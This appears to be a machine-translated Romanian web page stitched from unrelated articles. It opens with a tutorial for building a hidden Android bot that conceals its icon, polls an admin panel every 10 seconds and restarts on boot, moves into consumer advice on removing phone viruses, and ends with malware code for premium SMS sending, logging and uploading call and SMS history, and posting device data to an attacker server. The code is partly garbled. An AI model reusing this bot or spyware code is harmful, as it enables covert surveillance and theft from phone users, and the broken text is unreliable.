Cum să devii un hacker Android.

Da, nu este nevoie să fii prea inteligent aici. Mergem doar pas cu pas.
1. Instalați java pentru dezvoltatori din afara site-ului. (http://www.oracle.com/technetwork/java/javase/downloads/index.html)
2. Descărcați Android studio(http://developer.android.com/sdk/index.html#Other) Descărcați cel recomandat complet. Acum nu vom intra în toate aceste detalii. Avem nevoie de ea?
3. Ne aprovizionăm cu covrigi și bere. La urma urmei, acum trebuie să instalați și să configurați toate acestea.
4. De cele mai multe ori mai mult, fără să ne gândim la ce scrie acolo. Nu trebuie să-ți faci griji
5. După care am instalat toate acestea. Lansăm studioul. Căutăm pictograma SDK Manager în partea de sus. E undeva în dreapta. Faceți clic, bifați casetele peste tot, acceptați termenii și faceți clic pe Instalare.
6. Din nou roadem covrigi și bem bere grozavă. Aici procesul va dura mai mult, deoarece mașinile virtuale și tot felul de instrumente vor fi descărcate.
7. Ei bine, asta-i tot.

Cum a început totul?

Am instalat totul, acum este timpul să ne gândim cum să scriem un virus. Și pentru asta mergem la File -> New -> New project. Și aici ni se cere să venim cu un nume pentru proiect și un domeniu pentru site-ul web al companiei. Intrăm în orice ne vine în minte. Pe baza acestor date, este generat un nume de pachet. Care este folosit ca un identificator unic pentru APK-ul nostru. Faceți clic pe următorul. Aici ni se oferă să alegem o platformă pentru proiectul nostru. Ei bine, aici selectăm doar Telefon. Ne vom uita la restul mai târziu.
Următorul. Și acum ni se cere să alegem cum va arăta fereastra noastră de pornire (Activitatea), principalul lucru. Există o caracteristică importantă aici. Pentru a rula orice cod imediat după instalare, trebuie să aveți una dintre ferestre la pornire. Prin urmare, selectăm altceva decât Fără activitate. Cel mai bine este să alegeți Gol. Va fi mai ușor să-l curățați de resturile inutile. Următorul. Scrieți numele ferestrei și faceți clic pe Terminare.

În timp ce noile fișiere de proiect sunt indexate și generatorul de proiecte este configurat.

Hei, ești prea gras!

Încercăm să ne asamblam proiectul. Build -> Generate signed apk.. Și ce vedem? APK cu 1 fereastră și o aplicație care nu face nimic. Ocupă 1 megaoctet. Trebuie să facem ceva în acest sens, și anume să renunțăm la biblioteci (AppCompat). Acestea sunt grafice frumoase de care nu avem nevoie. Accesați fișierul MainActivity.java
Inlocuim

Clasa publică MainActivity extinde AppCompatActivity

Clasa publică MainActivity extinde Activitatea

şterge

Import android.support.v7.app.AppCompatActivity;

Accesați setările proiectului și în fila Depende ștergeți linia cu AppCompat. Apoi, accesați fișierul values.xml și styles.xml. Le ștergem.

Accesați androidManifest.xml și modificați

Android:theme="@style/AppTheme"

Android:theme="@android:style/Theme.Translucent.NoTitleBar"

Ne construim aplicația, ură! dimensiunea este mai mică de 40 kb. Există deja ceva cu care să lucrezi.

De ce nu te ascunzi?

Apoi, trebuie să ne ascundem animalul. Pentru ca pictograma să nu fie vizibilă în lista managerului de aplicații. De asemenea, trebuie să ne închidem aplicația.
Inserăm după setContentView(R.layout.activity_main) următorul cod:

String pgkname = getApplicationContext().getPackageName(); ComponentName componentToDisable = nou ComponentName(pgkname,pgkname+".MainActivity"); getApplicationContext().getPackageManager().setComponentEnabledSetting(componentToDisable, PackageManager.COMPONENT_ENABLED_STATE_DISABLED, PackageManager.DONT_KILL_APP);

Acest cod va ascunde pictograma noastră și după toate acestea scriem:

Acum aplicația noastră după instalare. Pornește și dispare imediat din vedere. Uau, am lucrat. Dar trebuie să mergem mai departe, altfel botul nu va apărea în panoul de administrare.
Bat, bat, deschide, politie!
Acum trebuie să facem minunatul nostru APK să înceapă să bată în panoul de administrare. În acest moment deja cred că panoul de administrare a fost scris undeva. Și tot ce trebuie să facem este să batem. Să luăm cea mai simplă metodă, nu va funcționa corect pe androizi peste 4.x. Dar trebuie să înveți din ceva. Nu-ți fac treaba pentru tine. Trebuie să creăm un serviciu. Pentru a face acest lucru, creăm un fișier cu o nouă clasă. (Clic dreapta în proiect, în folderul Java). Scriem numele clasei de exemplu Network. Faceți clic pe OK. Ștergem tot conținutul fișierului, cu excepția primei linii în care este scris pachetul și îl înlocuim cu

Import android.app.Service; import android.content.Intent; import android.os.IBinder; import org.apache.http.HttpResponse; import org.apache.http.client.HttpClient; import org.apache.http.client.methods.HttpGet; import org.apache.http.client.methods.HttpPost; import org.apache.http.entity.StringEntity; import org.apache.http.impl.client.DefaultHttpClient; import java.io.InputStream; import java.util.Timer; import java.util.TimerTask; public class Network extinde Service( @Override public int onStartCommand(Intent intent, int flags, int startId) ( return Service.START_STICKY; ) @Override public IBinder onBind(Intent intent) (aruncă nou UnsupportedOperationException(""); ) @Override public void onCreate() ( MyTimerTask myTask = new MyTimerTask(); Timer myTimer = new Timer(); myTimer.schedule(myTask, 10000, 10000); ) class MyTimerTask extinde TimerTask ( public void run() ( String result = ""; rezultat = GET("http://site.ru/?q="); // Rezultatul procesării ) ) public String GET(String url)( InputStream inputStream = null; String result = ""; încercați ( HttpClient httpclient = new DefaultHttpClient(); HttpResponse = httpclient.execute(new HttpGet(url)); inputStream = httpResponse.getEntity(). ( ) returnează rezultatul;

Acest cod descrie o clasă de serviciu în care, la lansare, pornește un cronometru și la fiecare 10 secunde trimite o solicitare GET la adresa URL și solicită un răspuns. Dar asta nu este tot. Acest cod nu va funcționa dacă ne declarăm serviciul în manifest și nu dăm dreptul de acces la internet aplicației noastre. Să mergem la manifest.

Adăuga

și în descrierea aplicației

Tot ce rămâne este să lansăm serviciul nostru. Accesați MainActivity și înainte de finish() introduceți începutul serviciului

GetApplicationContext().startService(new Intent(getApplicationContext(), Network.class));

Linia de sosire

Acum avem un apk care se ascunde după lansare și începe procesul de accesare a panoului de administrare. Unde este scris // Rezultatul procesării: comenzile de răspuns și de administrare sunt procesate acolo. Nu e greu, nu? Dar deocamdată beam bere. Am uitat complet asta dacă telefonul este repornit. Aplicația noastră nu va începe niciodată. Pentru a face acest lucru, ne întoarcem la manifest.
Adăugați drepturi pentru lansare după repornire:

Trebuie să adăugăm un handler la descrierea aplicației

Acum, după o repornire, va fi apelată clasa Boot. Și acum o vom crea. Facem totul așa cum am scris mai sus. A creat și șters totul, cu excepția pachetului.

Import android.content.BroadcastReceiver; import android.content.Context; import android.content.Intent; clasă publică Boot extinde BroadcastReceiver ( @Override public void onReceive(Context context, Intent arg1) ( context.startService(new Intent(context, Network.class)); ) )

Sfârșitul, și câteva cuvinte.

În cele din urmă, avem doar un astfel de robot de jucărie (APK). Ceea ce vă va oferi o bază bună și vă va oferi o mică înțelegere a modului în care funcționează totul.

De ce a început brusc telefonul tău mobil să se comporte diferit de cel obișnuit, sau chiar „și-a luat” propria „viață”? Poate pentru că s-a instalat un program rău intenționat în el. Astăzi, numărul de viruși și troieni pentru Android crește exponențial. De ce? Da, deoarece scriitorii vicleni de virus știu că smartphone-urile și tabletele sunt din ce în ce mai folosite de concetățenii noștri ca portofele electronice și fac totul pentru a transfera fonduri din conturile proprietarilor în buzunarele lor. Să vorbim despre cum să înțelegeți că dispozitivul dvs. mobil a luat o infecție, cum să eliminați un virus de pe Android și să vă protejați de infecțiile repetate.

Simptomele unei infecții cu virus pe un dispozitiv Android

• Gadgetul pornește mai mult decât de obicei, încetinește sau repornește brusc.
• Istoricul SMS-urilor și apelurilor telefonice conține mesaje de ieșire și apeluri pe care nu le-ați efectuat.
• Banii sunt debitați automat din contul dvs. de telefon.
• Anunțurile care nu sunt asociate cu nicio aplicație sau site sunt afișate pe desktop sau browser.
• Programele sunt instalate singure, Wi-Fi, Bluetooth sau camera sunt pornite.
• Am pierdut accesul la portofelele electronice, serviciile bancare mobile sau, din motive necunoscute, suma din conturile mele a scăzut.
• Cineva ți-a preluat contul de pe rețelele de socializare sau de mesagerie instant (dacă este folosit pe un dispozitiv mobil).
• Gadgetul este blocat, iar pe ecran este afișat un mesaj că ați încălcat ceva și trebuie să plătiți o amendă sau pur și simplu să transferați bani cuiva pentru a-l debloca.
• Lansarea aplicațiilor s-a oprit brusc, s-a pierdut accesul la foldere și fișiere, iar unele funcții ale dispozitivului au fost blocate (de exemplu, butoanele nu au putut fi apăsate).
• La lansarea programelor, apar mesaje precum „a apărut o eroare în aplicația com.android.systemUI”.
• Pictogramele necunoscute au apărut în lista de aplicații, iar procesele necunoscute au apărut în managerul de activități.
• Programul antivirus vă informează când sunt detectate obiecte rău intenționate.
• Programul antivirus s-a șters spontan de pe dispozitiv sau nu pornește.
• Bateria telefonului sau a tabletei a început să se descarce mai repede decât de obicei.

Nu toate aceste simptome sunt 100% indicative ale unui virus, dar fiecare este un motiv pentru a vă scana imediat dispozitivul pentru infecție.

Cel mai simplu mod de a elimina un virus mobil

Dacă gadgetul rămâne operațional, cel mai simplu mod de a elimina virusul este folosirea antivirusului instalat pe Android. Rulați o scanare completă a memoriei flash a telefonului și, dacă este detectat un obiect rău intenționat, selectați opțiunea „Ștergere”, salvând copia neutralizată în carantină (în cazul în care antivirusul a detectat ceva sigur și l-a confundat cu un virus).

Din păcate, această metodă ajută în aproximativ 30-40% din cazuri, deoarece majoritatea obiectelor rău intenționate rezistă în mod activ să fie eliminate. Dar există și control asupra lor. În continuare ne vom uita la opțiuni când:

• antivirusul nu pornește, nu detectează sau nu elimină sursa problemei;
• malware-ul este restaurat după eliminare;
• Dispozitivul (sau funcțiile sale individuale) este blocat.

Eliminarea programelor malware în modul sigur

Dacă nu vă puteți curăța telefonul sau tableta în mod normal, încercați să o faceți în siguranță. Majoritatea programelor rău intenționate (nu doar cele mobile) nu arată nicio activitate în modul sigur și nu împiedică distrugerea.

Pentru a porni dispozitivul în modul sigur, apăsați butonul Pornit/Oprit, puneți degetul pe „Oprire” și țineți apăsat până când apare mesajul „Intrați în modul sigur”. După aceea, faceți clic pe OK.

Dacă aveți o versiune veche de Android - 4.0 și o versiune anterioară, opriți gadgetul în mod obișnuit și porniți-l din nou. Când sigla Android apare pe ecran, apăsați simultan tastele de creștere a volumului și de reducere a volumului. Țineți-le apăsat până când dispozitivul pornește complet.

În modul sigur, scanați-vă dispozitivul cu un antivirus. Dacă nu există antivirus sau nu pornește dintr-un motiv oarecare, instalați-l (sau reinstalați-l) de pe Google Play.

Această metodă elimină cu succes virușii publicitari precum Android.Gmobi 1 și Android.Gmobi.3 (conform clasificării Dr. Web), care descarcă diverse programe pe telefon (pentru a crește ratingul) și, de asemenea, afișează bannere și reclame pe desktopul.

Dacă aveți drepturi de superutilizator (root) și știți exact ce a cauzat problema, lansați un manager de fișiere (de exemplu, Root explorer), urmați calea în care se află acest fișier și ștergeți-l. Cel mai adesea, virușii mobili și troienii își plasează corpurile (fișiere executabile cu extensia .apk) în directorul sistem/aplicație.

Pentru a trece la modul normal, pur și simplu reporniți dispozitivul.

Eliminarea virușilor de pe mobil prin computer

Eliminarea virușilor de pe un telefon prin intermediul unui computer ajută atunci când un antivirus mobil nu poate face față sarcinii sale chiar și în modul sigur sau funcțiile dispozitivului sunt parțial blocate.

Există, de asemenea, două moduri de a elimina un virus de pe o tabletă și telefon folosind un computer:

• utilizarea unui antivirus instalat pe un PC;
• manual printr-un manager de fișiere pentru gadgeturi Android, de exemplu, Android Commander.

Folosind antivirus pe computer

Pentru a scana fișierele dispozitivului mobil cu un antivirus instalat pe computer, conectați telefonul sau tableta la computer cu un cablu USB, selectând metoda „Ca unitate USB”.

Apoi porniți USB.

După aceasta, 2 „discuri” suplimentare vor apărea în folderul „Computer” de pe computer - memoria internă a telefonului și cardul SD. Pentru a începe scanarea, deschideți meniul contextual al fiecărui disc și faceți clic pe „Scanați pentru viruși”.

Eliminarea programelor malware utilizând Android Commander

Android Commander este un program pentru schimbul de fișiere între un gadget mobil Android și un computer. Când este lansat pe un computer, acesta oferă proprietarului acces la memoria unei tablete sau telefon, permițându-vă să copiați, să mutați și să ștergeți orice date.

Pentru acces complet la tot conținutul gadget-ului Android, trebuie mai întâi să obțineți drepturi de root și să activați depanarea USB. Acesta din urmă este activat prin aplicația de serviciu „Setări” - „Sistem” - „Opțiuni pentru dezvoltatori”.

Apoi, conectați gadgetul la computer ca pe o unitate USB și rulați Android Commander cu drepturi de administrator. În ea, spre deosebire de Windows Explorer, protejat fișiere de sistemși directoarele sistemului de operare Android - la fel ca, de exemplu, în Root Explorer - un manager de fișiere pentru utilizatorii root.

Jumătatea dreaptă a ferestrei Android Commander arată directoare dispozitiv mobil. Găsiți fișierul executabil al aplicației (cu extensia .apk) care cauzează problema și ștergeți-l. Ca alternativă, copiați folderele suspecte de pe telefon pe computer și scanați fiecare dintre ele cu un antivirus.

Ce trebuie să faceți dacă virusul nu este eliminat

Dacă operațiunile de mai sus nu au dus la nimic - malwareîncă se face simțit, iar dacă sistemul de operare încetează să funcționeze normal după curățare, va trebui să recurgeți la una dintre măsurile radicale:

• resetare cu restaurarea setărilor din fabrică prin meniul de sistem;
• hard reset prin meniul Recuperare;
• reîncărcarea dispozitivului.

Oricare dintre aceste metode va readuce dispozitivul în aceeași stare ca după cumpărare - nu vor mai rămâne programe de utilizator pe el, setări personale, fișiere și alte informații (date despre SMS, apeluri etc.). Dvs cont Google. Prin urmare, dacă este posibil, transferați agenda telefonică pe cartela SIM și copiați aplicatii platiteși alte obiecte valoroase pentru mediile externe. Este recomandabil să faceți acest lucru manual - fără a utiliza programe speciale pentru a nu copia accidental virusul. După aceasta, începeți „tratamentul”.

Restabilirea setărilor din fabrică prin meniul de sistem

Această opțiune este cea mai simplă. Poate fi folosit atunci când funcțiile sistem de operare iar dispozitivul în sine nu este blocat.

Accesați aplicația „Setări”, deschideți secțiunea „Personal” - „ Backup" și selectați "Resetați la setările din fabrică".

Resetare completă prin meniul Recuperare

O resetare „hard” va ajuta la tratarea malware-ului dacă acesta nu este eliminat prin oricare dintre metodele de mai sus sau a blocat autentificarea. Spre bucuria noastră, accesul la meniul Recuperare (recuperare sistem) este păstrat.

Conectați-vă la Recuperare telefoane diferite iar tabletele sunt realizate în felul lor. La unele, pentru aceasta, trebuie să țineți apăsată tasta „Volum +” la pornire, pe altele - „Volum -”, pe altele - apăsați un buton special încastrat etc. Informațiile exacte sunt conținute în instrucțiunile pentru dispozitiv .

În meniul Recuperare, selectați opțiunea „Ștergeți datele/resetarea din fabrică” sau pur și simplu „Resetare din fabrică”.

Intermitent

Flashing înseamnă, în esență, reinstalarea sistemului de operare Android, aceeași ultimă soluție ca și reinstalând Windows pe computer. Se recurge la el în cazuri excepționale, de exemplu, atunci când un anumit virus chinezesc este încorporat direct în firmware și trăiește pe dispozitiv încă de la „naștere”. Un astfel de malware este spyware. program android spion 128 origine.

Pentru a flash un telefon sau o tabletă, veți avea nevoie de drepturi de root, un kit de distribuție (firmware-ul în sine), un program de instalare, un computer cu un cablu USB sau un card SD. Rețineți că fiecare model de gadget are propriile versiuni individuale de firmware. Instrucțiunile de instalare sunt de obicei incluse cu ele.

Cum să evitați infectarea cu virusuri a dispozitivelor Android

• Instala aplicații mobile numai din surse de încredere, refuzați programele piratate.
• Actualizați-vă dispozitivul pe măsură ce sunt lansate actualizări de sistem - în acestea, dezvoltatorii închid vulnerabilitățile care sunt exploatate de viruși și troieni.
• Instala antivirus mobil si tine-l mereu aprins.
• Dacă gadgetul dvs. servește drept portofel, nu permiteți altor persoane să-l folosească pentru a accesa Internetul sau pentru a deschide fișiere neverificate pe acesta.

Virușii pot fi de două tipuri:

1. Fals - sunt folosite numele și pictograma unei aplicații binecunoscute, dar în interior există doar cod rău intenționat. Majoritatea virusurilor sunt de acest tip.

2. Cal troian - cod rău intenționat este adăugat la o aplicație normală, care funcționează împreună cu aplicația.

Ce pot face virușii

1. Furați bani de pe o cartelă SIM: sunați sau trimiteți SMS la numerele plătite până când cartela SIM rămâne fără bani.

2. Fură informații: trimite parole de la băncile online, date carduri bancare sau fișiere personale către escroci care trimit mesaje cu link-uri virale către numere din agenda ta în numele tău.

3. Blocați munca normala dispozitive: afișați un banner ransomware care vă împiedică să utilizați dispozitivul.

4. Folosiți puterea dispozitivului dvs.: afișați reclame ascunse sau minați criptomonede.

Cum ajung virușii pe un smartphone sau tabletă

Escrocii deghizează virușii în aplicații și fișiere inofensive: browsere, jucători, jocuri, navigatoare, cărți, antivirusuri. Apoi le distribuie:

1. Pe site-uri pentru adulți, site-uri cu aplicații piratate și filme piratate, trackere de torrent etc.

De exemplu, cauți un joc sau un program pe internet și ajungi pe un forum. Cineva a lăsat legătura necesară și toată lumea îi mulțumește în unanimitate.

De fapt, forumul și comentatorii nu sunt reale.

Sau accesați un site cu filme și seriale TV piratate, apare un mesaj. Se spune că smartphone-ul/tableta este infectat cu viruși sau că vreun program este foarte depășit. Se întâmplă chiar ca dispozitivul să înceapă să vibreze sau să scoată sunete ciudate.

De fapt, nu este cazul și totul este în regulă cu dispozitivul.

2. Prin SMS, MMS și e-mail

De regulă, acestea sunt SMS-uri de la „fete de pe site-uri de întâlniri”, de pe site-uri de anunturi gratuite, scrisori de la „notarii din Germania”, mesaje despre câștigarea la loterie.

Ai grijă, nu există miracole. În cele mai multe cazuri, aceștia sunt escroci.

Toate astfel de mesaje au un scop comun - să te facă să dai clic pe un link, astfel încât virusul să se descarce pe dispozitivul tău.

Cum infectează virușii un smartphone sau o tabletă

Pentru ca virusul să înceapă să funcționeze, nu este suficient să îl descărcați - trebuie și să îl instalați. Virușii sunt de obicei descărcați în folderul Descărcare și arată ca fișiere de instalare aplicații cu extensia „apk”.

Dacă faceți clic pe un virus, va apărea o listă de permisiuni. Permisiunile sunt acțiunile pe care o aplicație le va putea efectua după instalare.

Dacă faceți clic pe „Instalare”, virusul se va instala și va începe să funcționeze.

Cum să distingem un virus de o aplicație normală

Majoritatea virușilor sunt scriși de neprofesioniști care vor să obțină bani rapid și fără probleme cu legea. Prin urmare, semnele standard ale unor astfel de viruși sunt permisiunile de a trimite mesaje sau apeluri. Când un astfel de virus este instalat, va începe să trimită în liniște SMS-uri sau să apeleze numere cu plată.

Să comparăm aplicațiile reale și virușii. Dr.Web Antivirus:

Permisiunile antivirusului original de la Magazin Play

Permisiunile unui virus care se pretinde a fi un antivirus

Navigator Yandex:

Permisiunile navigatorului original din Magazinul Play

Permisiunile unui virus care se pretinde a fi un navigator

Joc Talking Tom 2:

Permisiunile jocului original Volumul 2 din Magazinul Play

Permisiuni ale virusului care se pretinde a fi un joc Volumul 2

Desigur, nu toate aplicațiile care solicită acces la apeluri și mesaje sunt viruși. Și nu toți virușii solicită acces la funcțiile plătite.

Dacă escrocii doresc să filmeze cu camera dvs., veți avea nevoie de acces la cameră și la internet.
Dacă fișierele dvs. sunt necesare, acestea vă vor cere acces la memorie și la Internet.
Dacă vor să blocheze ecranul cu un banner, vor cere drepturi de administrator.
Și unii viruși chiar știu să ascundă permisiunile în timpul instalării.

Este dificil să identifici un virus bine făcut - sau trebuie să te uiți cod sursă aplicații sau instalați un virus pe dispozitiv, eliminați jurnalele din acesta (jurnalul de incidente) și înțelegeți-le. Din fericire, astfel de virusuri sunt rare. De cele mai multe ori, două îndrumări vă vor fi utile:

Dacă o aplicație a fost descărcată de pe un site necunoscut și solicită acces la funcții plătite, este un virus în 99% din cazuri.

Cum să vă protejați smartphone-ul sau tableta de viruși

1. Instalează aplicații doar din Play Store și alege-le cu seriozitate

Este foarte dificil pentru o persoană neinstruită să distingă un virus de o aplicație normală. Pentru a proteja utilizatorii, Google a creat un catalog special cu aplicații - Play Market.

Înainte de a adăuga o aplicație în Magazinul Play, Google verifică dacă conține cod rău intenționat. Utilizatorii care descarcă aplicații din Magazinul Play sunt mai protejați decât cei care descarcă aplicații de pe diferite site-uri și forumuri. Dar amintiți-vă că nimic nu este complet sigur, așa că alegeți aplicațiile cu seriozitate: citiți cu atenție permisiunile și uitați-vă la evaluări.

2. Nu faceți clic pe linkuri necunoscute din SMS, MMS sau e-mail

Escrocii au învățat chiar să falsifice numere și adrese e-mail, așa că mesajele cu link-uri virale pot veni și de la prietenii tăi.

3. Nu rootați dispozitivul și nu instalați firmware neoficial

Dacă dispozitivul este rootat, virusul se va putea înregistra singur aplicații de sistemși apoi doar o clipire completă a dispozitivului îl poate elimina.

4. Dezactivați primirea automată de MMS pe dispozitivul dvs

Escrocii pot descărca automat viruși pe dispozitivul dvs. prin MMS. Acest lucru se datorează vulnerabilităților din biblioteca Stagefright.

Pentru a dezactiva descărcarea automată MMS, selectați: Mesaje → Opțiuni → Setări → (Avansat) → MMS → Primire automată (Descărcare automată) → Dezactivare.

5. Nu activați serviciul bancar „Plată automată” (încărcare automată a soldului unui număr de telefon atunci când acesta scade la o anumită sumă)

Dacă brusc dispozitivul dvs. este infectat cu un virus care trimite SMS-uri către numerele plătite, soldul cartelei SIM va fi reîncărcat până la epuizarea banilor de pe card. Mesajele de la bancă sunt de obicei blocate.

Sfat: Pentru a primi mesaje de la bănci și alți expeditori importanți, cumpărați un număr separat pe care nimeni nu îl va ști și un număr de telefon simplu.

Cum să înțelegeți că a apărut un virus pe smartphone sau tabletă

Nu există semne clare; totul depinde de virus. Unele sunt vizibile imediat după instalare (apare un banner și accesul la dispozitiv este blocat), altele s-ar putea să nu se dezvăluie mult timp. În cele mai multe cazuri, semnele sunt:

• Apar facturi mari pentru SMS-uri sau apeluri;
• Apare un banner care cere să plătiți escrocii, ceea ce vă împiedică să utilizați dispozitivul;
• Apar programe necunoscute;
• Bateria începe să se epuizeze foarte repede;
• Traficul pe internet este consumat rapid de aplicații de neînțeles;
• Dispozitivul începe să încetinească foarte mult.

Cum să eliminați un virus dacă se deschide meniul

Cum să eliminați un virus dacă meniul nu se deschide (banner ransomware)

Dacă pe ecran apare un banner ransomware și vă împiedică să utilizați dispozitivul:

Nu transferați bani către escroci - aceștia tot nu vă vor debloca dispozitivul.

Scoateți cartela SIM pentru a preveni debitarea banilor din contul dvs.

Porniți dispozitivul în modul sigur.

Dacă bannerul din modul sigur dispare, dezactivați drepturile de administrator pentru toate aplicațiile.

Dacă bannerul nu dispare, treceți la pasul nr. 11.

Vezi toate aplicații instalateși eliminați pe cei necunoscuti pentru dvs.

Reporniți dispozitivul. Dispozitivul va porni în modul normal, nu ar trebui să existe niciun banner.

Dacă bannerul apare după o repornire, treceți la pasul nr. 11.

Descărcați un antivirus în care aveți încredere prin Wi-Fi din Magazinul Play.

Designul virușilor și mecanismele de funcționare ale antivirusurilor se schimbă zilnic, așa că este imposibil să se recomande vreun antivirus anume. Concentrați-vă pe evaluările și recenziile altor utilizatori. Potrivit autorului, antivirusurile bune sunt: ​​Eset, Kaspersky și Dr. Web.

Scanați-vă dispozitivul cu un antivirus și eliminați orice viruși găsit.

Dezinstalați antivirusul pe care l-ați instalat.

Descărcați un alt antivirus și verificați din nou dispozitivul.

Dacă opțiunile anterioare nu ajută, resetați dispozitivul.

Dacă nu puteți face față singur virusului, contactați centru de service Samsung.

Ai nevoie de un antivirus pe Android?

Dacă ești un utilizator începător și nu ai încredere în abilitățile tale, ai nevoie de el. Dar numai unul.

Dacă utilizați dispozitivul cu atenție și respectați regulile de siguranță, nu trebuie să instalați un antivirus.

Colecția de aplicații Android rău intenționate a unor laboratoare antivirus conține deja peste 10 milioane de mostre. Această cifră excită imaginația, dar aproximativ 9 milioane 995 mii dintre ele sunt redenumite copii ale virușilor originali. Dar dacă analizați codul sursă al celor câteva mii de mostre de malware rămase, veți observa că toate sunt combinate dintr-un număr mic de blocuri funcționale unice (mai multe modificate și combinate în moduri diferite).

Chestia este că producătorii de virusuri urmăresc cel mai adesea sarcini foarte banale:

• trimite un SMS la un număr plătit;
• prelua informațiile confidențiale ale utilizatorului ( numere de telefon, textele mesajelor, datele de pe cardul SD și așa mai departe);
• colectează date despre dispozitivul infectat;
• ia stăpânire drepturi de administrator pe dispozitiv (pentru a instala aplicații fără permisiunea proprietarului sau pentru a dezactiva dispozitivul în mod rău intenționat);
• urmăriți login-urile, parolele și datele cardului de plată pe care utilizatorul le introduce pe site-urile web ale sistemelor de internet banking. 


Cum o fac? Să încercăm să pătrundem în lumea întunecată a virtualizării mobile și să vedem ce se întâmplă acolo.

Cine folosește:

• AdSms;
• FakePlayer;
• HipoSms.

Cel mai comun tip de viruși sunt troienii SMS. Acești viruși trimit pur și simplu mesaje către numere premium fără acordul utilizatorului. Creați un astfel de program sau rescrieți unul gata făcut pentru numărul dorit destul de usor. Iar procesul de obținere a beneficiilor este extrem de simplificat – spre deosebire, de exemplu, de urmărirea datelor bancare.

Următorul este cel mai simplu exemplu cod. Aceasta este o funcție de bază de trimitere SMS. Se poate complica prin verificarea stării expedierii, selectarea numerelor în funcție de locația abonatului și apoi ștergerea SMS-ului.

SendSms static privat (String DestNumber, String SmsText) ( // Încercarea de a rula metoda sendTextMessage a obiectului SmsManager ( program standard pentru a trimite SMS de pe dispozitivul curent) cu un număr minim de parametri: numărul destinatarului și textul mesajului try( SmsManager.getDefault().sendTextMessage(DestNumber,null,SmsText,null,null); return true; ) )

Unde să cauți codul virusului

În marea majoritate a cazurilor, un telefon este infectat prin instalarea de aplicații. Orice aplicație Android există sub forma unui fișier cu extensia apk, care este în esență o arhivă. Puteți vizualiza conținutul acestuia din folosind Android SDK, convertor Fișiere APKîn JAR și Java bytecode decompiler. Compilarea aplicației (APK) constă din următoarele părți:

• resurse.arsc - tabel de resurse;
• res (dosar) - resurse reale (icoane etc.);
• META-INF (folder) - conține fișiere cu următorul conținut: sume de verificare a resurselor, certificat de aplicație și descriere a ansamblului APK;
• AndroidManifest.xml - tot felul de informații despre servicii. Inclusiv permisiunile pe care aplicația le solicită înainte de instalare pentru funcționarea corectă;
• classes.dex - probabil că ați auzit asta în sisteme de operare Android sisteme, tot codul este executat folosind mașina virtuală Dalvik (începând cu versiunea 4.4, apare suportul ART), care nu înțelege bytecode Java obișnuit. De aceea există fișiere cu extensia dex. Acesta, alături de clasele necesare și utile (care sunt responsabile de funcționalitatea aplicației), conține și pe cele rău intenționate (codul de virus, pe care îl analizăm în acest articol).

Înregistrarea informațiilor despre utilizator în fișier text

Cine folosește:

• NickySpy;
• SMSSpy.

Există o categorie de viruși care exploatează datele personale ale utilizatorilor. Mecanismul acțiunii lor este de asemenea simplu. Fie încarcă fișiere utilizator pe serverul creatorului lor, fie colectează în prealabil unele date în txt (CSV, XML - nu contează). Contactele de orice tip, mesajele de la diferite mesagerie instant, fișierele media etc. pot fi de interes pentru atacatori.

Mesajele SMS de la utilizatorii infectați sunt deosebit de valoroase pentru numerele de telefon ale expeditorilor și destinatarilor - pot fi folosite pentru a suplimenta baza de date pentru mesajele spam. Mai rar, virușii de acest fel sunt folosiți pentru a infecta dispozitivele unor anumiți indivizi - data viitoare când prietena ta te invită să testezi aplicația pentru Android pe care a scris-o (ah, caramba! - Nd.), nu lăsa garda jos :) .

// Numără numărul de SMS-uri de pe dispozitiv arrayOfObject = (Object)localBundle.get("pdus"); int j=arrayOfObject.length; // Buclă prin fiecare SMS i=1 while (adevărat) (​if(i>=j) break; // Creați un obiect de mesaj SMS SmsMessage localSmsMessage=SmsMessage.createFrompdu((byte)arrayOfObject[i]); // Introduceți în variabilele de tip șir numărul expeditorului, textul și ora trimiterii SMS String MessageNumber = localSmsMessage.getOriginatingAddress( String MessageText = localSmsMessage.getDisplayMessageBody(); HH:mm:ss").format(localDate); // Formează un șir din datele primite și scrie-l într-un fișier text folosind metoda personalizată WriteRec String MessageInfo= 7MessageNumber+"#"+ MessageText+"#" + MessageTimeDate+"; " WriteRec(paramContext,"sms.txt",MessageInfo); // Treceți la următorul mesaj i+=1; ) De asemenea, este convenabil să completați lista de spam din istoricul apelurilor abonatului. Acest cod poate fi rulat atunci când există un apel de intrare: If (parmIntent.getAction().equals("android.intent.action.NEW_OUTGOING_CALL")) ( // Puneți numărul abonatului în variabila String phonenumber=paramIntent.getStringExtra( "android.intent. extra.PHONE_NUMBER" // Formează un șir din numărul și data apelului String PhoneCallRecord= phonenumber +"#"+getSystemTime() // Apelează metoda WriteRec(); dat aici), care adaugă o linie la fișierul text cu istoricul apelurilor WriteRec(paramContext,"phonecall.txt", PhoneCallRecord )

După ce informațiile sunt înregistrate, acestea sunt transmise „mâinilor drepte”. Codul de mai jos încarcă istoricul apelurilor pe server:

Private void uploadPhonecallHistory() aruncă IDException ( while(true) ( ​​​​return; // Verificați dacă fișierul de care avem nevoie există dacă(!fileIsExists(/data/data/spyapp.pg/files/phonecall.txt")) continuă; // Creați un obiect - uploader de fișiere UploadFiles localUploadFiles(); String uploadkeynode=getKeyNode("uid","uid_v" // Rulați metoda .advanceduploadfile (codul său nu este dat aici) pentru a încărca fișierul în „virus”; maker” server localUploadFiles advanceduploadfile(uploadkeynode,"/data/data/spyapp.pg/files/phonecall.txt" ) )

Colectarea de informații

Cine folosește:

• DroidKungFu;
• DroidDream;
• marea majoritate a programelor malware de toate tipurile similare.

În principiu, orice producător de viruși ar beneficia de informații despre dispozitivele infectate de programele sale. Este foarte ușor de obținut. Este creată o matrice cu date despre proprietățile telefonului (ale lor lista completa poate fi găsit în manualul dezvoltatorului Android) și este trimis ca cerere POST unui script PHP (limbajul nu este important) de pe serverul atacatorului, care prelucrează datele și le plasează în baza de date pentru utilizare ulterioară.

Private void reportState(int paramInt, string paramString) ( // Creați o matrice și puneți în ea informații despre serviciu ArrayList UserInformation=new ArrayList(); UserInformation.add(new BasicNameValuePair("imei", this.mImei)); UserInformation.add ( new BasicNameValuePair("taskid", this.mTaskId)); it in array and its if(paramStrng !=null)&&(!").equals(paramString))) UserInformation.add(new BasicNameValuePair("comment", paramString)); // Creați o solicitare HTTP POST cu adresa scriptului care colectează date HttpPost localHttpPost = new HttpPost("http://search.virusxxxdomain.com:8511/search/rtpy.php"); încercați ( // Adăugați matricea noastră de date la cerere și executați-o folosind clientul HTTP standard localHttpPost.setEntity(new UrlEncodeFormEntity(UserInformation, "UTF-8"))); nou DefaultHttpClient().execute(localHttpPost).getStatusLine.getStatusCode(); reveni; ) )

